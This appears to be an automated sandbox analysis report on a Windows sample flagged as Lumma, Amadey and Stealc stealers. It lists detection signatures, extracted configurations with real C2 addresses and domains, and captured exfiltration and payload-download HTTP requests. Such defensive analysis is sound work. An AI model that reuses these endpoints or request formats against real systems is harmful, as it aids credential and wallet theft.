Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540246
MD5: df1b115ceeeb801e6987b690be5de396
SHA1: fde13ad5dca46dfb75934d89a90467d42c177472
SHA256: bd9db41e76c3c708f9fd9bad467d5c1f07e564cd419dcd07edaa11fab56df9cd
Tags: exeuser-Bitsight

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000006.00000003.2321093178.00000000053C0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 35.2.num.exe.480000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe.5328.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["eaglepawnoy.store", "clearancek.site", "licendfilteo.site", "bathdoomgaz.store", "mobbipenju.store", "spirittunek.store", "dissapoiznw.store", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe ReversingLabs: Detection: 47%
Source: file.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:60559 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60565 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60568 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60573 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60605 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60606 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60609 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60638 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60639 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60640 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000002.2418802394.0000000000A32000.00000040.00000001.01000000.00000009.sdmp, QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000003.2283631779.0000000004700000.00000004.00001000.00020000.00000000.sdmp
Source: firefox.exe Memory has grown: Private usage: 1MB later: 193MB

Networking

Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:60795 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:55808 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:54544 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:62507 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:62489 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:56217 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:55511 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:52723 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49740 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49945 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:49292 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:58046 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:52498 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:65031 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:50553 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49961
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:50573 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:58684 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49989 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:59213 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:63391 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:60644 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:56873 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:57306 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:59560 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:64698 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:60489 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49991 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49994 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49995 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:49650 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:52827 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:57069 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:64114 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:49266 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:55530 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50003 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50005 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:60556 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:53807 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:60588 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:60583 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:60598 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:50819 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:58297 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49711 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49712 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49988 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:60559 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49993 -> 104.102.49.254:443
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:48:18 GMTContent-Type: application/octet-streamContent-Length: 1926656Last-Modified: Wed, 23 Oct 2024 13:34:51 GMTConnection: keep-aliveETag: "6718fb7b-1d6600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:48:21 GMTContent-Type: application/octet-streamContent-Length: 1825792Last-Modified: Wed, 23 Oct 2024 13:34:44 GMTConnection: keep-aliveETag: "6718fb74-1bdc00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:48:23 GMTContent-Type: application/octet-streamContent-Length: 2850816Last-Modified: Wed, 23 Oct 2024 13:13:56 GMTConnection: keep-aliveETag: "6718f694-2b8000"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:49:08 GMTContent-Type: application/octet-streamContent-Length: 2994688Last-Modified: Wed, 23 Oct 2024 13:34:38 GMTConnection: keep-aliveETag: "6718fb6e-2db200"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:49:18 GMTContent-Type: application/octet-streamContent-Length: 1825792Last-Modified: Wed, 23 Oct 2024 13:34:44 GMTConnection: keep-aliveETag: "6718fb74-1bdc00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:49:27 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Wed, 23 Oct 2024 13:13:28 GMTConnection: keep-aliveETag: "6718f678-e0800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:49:32 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 2d 2d 0d 0a Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="build"doma------JDGCFBAFBFHJEBGCAEGH--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000976001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000977001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
